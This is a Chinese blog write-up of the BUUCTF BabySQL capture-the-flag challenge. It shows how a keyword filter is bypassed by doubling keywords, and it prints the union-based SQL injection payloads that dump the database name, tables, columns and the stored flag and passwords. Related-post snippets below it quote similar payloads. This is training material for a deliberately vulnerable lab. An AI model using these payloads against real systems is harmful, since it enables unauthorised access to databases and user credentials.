BUUCTF__[极客大挑战 2019]BabySQL_题解

最新推荐文章于 2024-04-16 16:15:28 发布
最新推荐文章于 2024-04-16 16:15:28 发布
阅读量399 收藏
点赞数
分类专栏: BUU做题记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/TM_1024/article/details/107022478
版权

前言

  • 今天,居然有了想去当初中暑假辅导老师的想法,恐怖如斯。
  • 主要是时间短,弹性时间,还能有时间学点东西。同时有点收入。
  • 还是系列sql注入。

读题

  • 就没啥了,还是熟悉的界面。
  • 首先尝试1、1'、1" ,得出是单引号闭合的字符型。而且还有报错回显。
  • 然后再拿字典跑一下,返回长度有726、751、大于900的。
  • 726,提示输入账号密码,应该是被替换为空了,过滤了 union 、select、if 、or等等。
    在这里插入图片描述
  • 751 ,提示账号密码错误,就说明没被过滤
    在这里插入图片描述
  • 大于900的则提示sql语句错误,说明也没被过滤
  • 于是发现,双写可以绕过。
    在这里插入图片描述
  • 所以,开始尝试

解题

  • 先根据报错得出列数为3 在这里插入图片描述

  • 尝试获取数据库名称,成功得到数据库名称geek

    ?username=1' ununionion seselectlect 1,2,database()  %23&password=1

在这里插入图片描述

  • 读取表,有一点是information_schema.tables里也有一个被过滤的or,所以也得局部双写infoorrmation_schema.tables,成功得到表名b4bsqlgeekuser

    ?username=1' ununionion seselectlect 1,2,group_concat(table_name) frofromm infoorrmation_schema.tables wherwheree table_schema=database() %23&password=1

在这里插入图片描述

  • 同理获取两个表的字段信息,先获取表b4bsql中的内容,得到id、username、password 字段名

    ?username=1' ununionion seselectlect 1,2,group_concat(column_name) frofromm infoorrmation_schema.columns wherwheree table_name='b4bsql' %23&password=1

在这里插入图片描述

  • 直接读取内容,注意password里也有个or,直接看到flag,因为太长,所以f12即可

    ?username=1' ununionion seselectlect 1,2,group_concat(id,0x3a,username,0x3a,passwoorrd) frofromm b4bsql %23&password=1

在这里插入图片描述

  • 结束

最后

  • 题目不难,也没有新知识点,
  • 有一点是,可以根据做过的题目来扩展自己sql注入的字典。丰富内容。
  • 附上题目链接
  • 持续更新BUUCTF题解,写的不是很好,欢迎指正。
  • 最后欢迎来访个人博客
风过江南乱
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buuctf web [挑战 2019]BabySQL
m0_46412682的博客
07-16 927
buuctf web [挑战 2019]BabySQL 开始的页面 随便输入用户名和密码 sql注入,先判断有多少字段 从图中可以看到select和union被过滤了,可以用双写selselectect uniunionon还有的是’单引号和#要编码变成%27 %23,先猜测4个字段,错误 3个字段,成功 ?username=admin&password=123%27ununionion selselectect 1,2,3%20%23 爆库 ?username=admin&
网络安全练习网站大全.rar
10-16
https://blog.csdn.net/ida0918/article/detail https://www.zhihu.com/question sql注入https://redtige web:http://hackin 综合:http://www.wechal 综合性黑game:http://www. 综合性新平台CTF:https://lab.pe 渗透:https://lab.pe CTF :https://ctf.hacker101.c https://ctf-wiki.github.io/ 安恒的平台:登录 - 明御® 攻防实验室 安恒的平台: https://www 一个综合的新平台,貌似里面二进制的题挺好:https://www 代码审计的平台(C语言):http://web 一个封装好的CTF平台:https://www.notsosecur 也是封装好的一些训练环境:https://www.vulnhub.com/# PHP安全训练平台:https://www.ripstech.com/php-sec 一个国外的CTFwiki,质量好像一般:http://ctf.forgottensec.co CTF工具库:https://www.ctft CTF指南:http:/ 等等 很多,这里就不一一列举了,对了还有一些社会工程学练习网站
BUUCTF之BabySQL[挑战 2019]
金 帛的博客
06-11 442
BUUCTF记录贴
BUUCTF [挑战 2019]BabySQL
最新发布
weixin_73399382的博客
04-16 323
使用payload:1' union selselectect 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23发现有报错,看了一下还能过滤的多半是where。使用payload:1' union select database(),version(),1%23报错,可能是union或者select中一个或者都是。双写by后不再报错,说明by被过滤需双写。
buuctf-[挑战 2019]BabySQL(小宇特详解)
小宇的web博客
01-19 5090
buuctf-[挑战 2019]BabySQL(小宇特详解) 这里看题的话是一道SQL注入。 这里先尝试一下万能密码 这里发现它过滤了or(直接删除了or) 这里尝试进行双写 也就是oorr,这里删除了or后又重新构造了一个or 这里发现还是不行 这里先看一下双写union select 1 /check.php?username=admin&password=1 %27 ununionion seselectlect 1 %23 这里发现不是报错,而是列数不对 当列数为3的时候对
acm.rar_浙江大学 ACM 题解
09-24
【标题】"acm.rar_浙江大学 ACM 题解" 涵盖的是关于浙江大学在ACM(国际大学生程序设计竞赛)方面的训练资料和解题思路。这些资源通常包括历年的竞赛题目、官方解答以及参赛者们分享的解题策略,旨在帮助学习者提升...
大整数的因子_题解noip_源码
10-04
在编程竞赛领域,如NOIP(全国青少年信息学奥林匹克联赛),常常会遇到处理大整数问题,本题目的核心就是探讨如何找到一个大整数的所有个位数因子。在这个问题中,我们不需要进行完整的高精度运算,而是巧妙地利用低...
leetcode题解_leetcode_leetcode题解_
09-29
它涵盖了大量来自LeetCode在线编程挑战平台的题目,旨在帮助开发者提升在算法、数据结构以及问题解决能力上的技能。LeetCode题解通常包括每道题目的详细描述、解题思路、最优解法、代码实现以及可能的优化策略。 一...
中国大学生数学建模竞赛题解_matlab
04-17
《中国大学生数学建模竞赛题解_matlab》这个资源主要关注的是如何利用MATLAB这一强大的数值计算和编程环境来解决数学建模问题。MATLAB,全称Matrix Laboratory,是为科学计算、工程分析以及数据分析等领域设计的一种...
leetcode部分题解.rar_java_leet 程序员_leetcode
09-21
这个名为"leetcode部分题解.rar_java_leet 程序员_leetcode"的压缩包,显然是一个专门为Java程序员准备的LeetCode题目详解资源,旨在帮助他们更好地应对面试中的技术挑战。 LeetCode涵盖了从基础到高级的各种问题,...
BUUCTF[挑战 2019]BabySQL
rumil的博客
06-25 1907
通过输入非0数字,能正常回显,0和字母不能正常回显,什么都没有显示。刚刚我们输入非0数字正常回显,0和字母不能正常的回显,猜测说明sql语句当中可能存在||运算符,只有输入非0数字,才会返回true,回显条件。可观察网页的源码信息,发现有check.php,猜测可能是登录界面时,输入账号和密码的跳转界面,提示信息。通过上面的过程我们不难发现,此时还存在过滤,from和where也被过滤,同理双写绕过。拿到该靶机,观察界面,存在登录说明存在可能SQL注入,根据题目也可得知存在SQL注入。
挑战2019】Baby SQL解题
Bird&Bird
10-25 1991
1、打开BUUCTF在线评测,选择web--->【挑战2019】Baby SQL。 2、首先采用万能密码试一下,出错了。 3、那使用普通注入试一下,报错了,从这里可以看出过滤了 union select 。 4、接着使用双写方式绕过过滤,试一下。 username=admin&password=123456' ununionion selselectect 1 %23 从结果上看,虽然也报错了,但提示不是sql语法错误,而且我们提供的查询字段数不对。 ..
[挑战 2019]BabySQL
wuuconix's blog
03-10 971
[挑战 2019]BabySQL 考点: SQL关键字过滤 双拼绕过 这道题延续之前的LoveSQL 的解体方法,思路一模一样,但是这道题过滤了许多关键字。比如union or order by from select 等等 下面是我做题时总结出来的如何判断某关键字被过滤的办法,比如我们现在判断or 有没有被过滤 check.php?username=-1' ors ;%23&password=1234 我在or后加了个s ,不管有没有被过滤,都会报错,我们看看它的报错 Yo
BUUCTF Web [挑战 2019]BabySQL
网安小趴菜
08-31 422
BUUCTF Web [挑战 2019]BabySQL
BUUCTF [web专项15][挑战 2019]BabySQL
yanglinchiji的博客
11-03 129
试一遍之后会发现or可能被过滤掉了,因为只有当or的形式变成非连接符的时候才可以通过。其实这题找出来万能钥匙成功登录后就没有想法了,看了一下别人的思路再做就ok了。进入后获得账号密码,用此账号密码进行登录,并在进行的同时进行注入操作。爆库,发现show databases不行,用麻烦点的。发现下面有个flag字段,选择爆数据。测试列数(密码需要自行修改)发现共有三列,开始测回显点。感觉在ctf中,再爆一下表。进入后发现是个登陆界面。查看表Flag下的字段。
[挑战 2019]BabySQL1
m0_73721944的博客
11-11 190
检查与您的MariaDB服务器版本对应的手册,以便在第1行'1=1#'和password='123 "附近使用正确的语法。1'ununionion seselectlect 1,2,3#&passward=1 有回显,说明有三列。1’ order by 3#&passward=123 报错发现order中的or与by都被过滤了。1'ununionion seselectlect 1,2,3,4#&passward=1 报错。打开是这样的,是之前两个题的升级版。有回显说明双写绕过是可行的。
BUUCTF:[挑战 2019]BabySQL
末初的CSDN博客
11-04 685
题目地址:https://buuoj.cn/challenges#[%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98%202019]BabySQL 简单测试之后发现有些字符被过滤,初步判断这里的过滤是指特殊字符被替换为空,如下图所示 使用Burp进行SQL过滤字符的Fuzz 这些长度为726响应内容是Input your username and password的Fuzz结果是被过滤的字符 Trick 替换为空的关键字过滤使用双写关键字绕过 这里空格.
CTF学习笔记——[挑战 2019]BabySQL
Obs_cure的博客
02-09 1388
一、[挑战 2019]BabySQL 1.题目 2.解题步骤 一看就知道是之前一个系列的题,可惜并不耽误我不会做… 在尝试的时候报错是看不懂的,这里简单记述一下心路历程。SQL注入的题目自然是1' or 1=1 # 结果很奇怪 这里在看过WP才知道是把or过滤掉了才有这样的回显。很明显我注入的东西和回显出来的东西不一样。那么是什么过滤呢,从这样的回显来看,是把or替换成了空白。师傅们的做法是双写。就是改成oorr。匹配的时候会把中间的替换成空 然后外面的再组成or。双写绕过学会了) 接下来就是常
复变思考题解答_2019_Fall1
08-03
复平面上三个相异且不共线的点z1, z2, z3构成一个三角形∆z1z2z3。我们要求出这个三角形的外接圆圆心z0的坐标,并证明当且仅当z0 = z1+z2+z3时,∆z1z2z3为正三角形,并求出外接圆的半径r。 根据外心的定义,外接圆...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值